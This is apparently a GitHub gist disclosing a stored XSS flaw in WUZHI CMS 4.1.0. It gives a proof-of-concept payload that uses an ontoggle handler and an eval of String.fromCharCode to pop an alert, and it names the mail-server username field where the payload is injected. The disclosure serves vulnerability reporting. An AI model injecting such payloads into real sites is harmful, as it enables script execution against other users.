Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
wuzhicms v4.1.0 persistent xss vulnerability
A persistent XSS vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.
POC
"> <details/open
/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>
Vulnerability trigger point
http://localhost/index.php?m=core&f=index&_su=wuzhicms. When attacker access -system settings - mail server - mail server - mailbox username, write poc content, then XSS vulnerability is triggered successfully.
1、choose this part and write poc to [mailbox username]
2、submit and view webpage
@feixuezhi

This comment has been minimized.

Copy link
Owner Author

@feixuezhi feixuezhi commented Jul 30, 2019

a

@feixuezhi

This comment has been minimized.

Copy link
Owner Author

@feixuezhi feixuezhi commented Jul 30, 2019

b

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment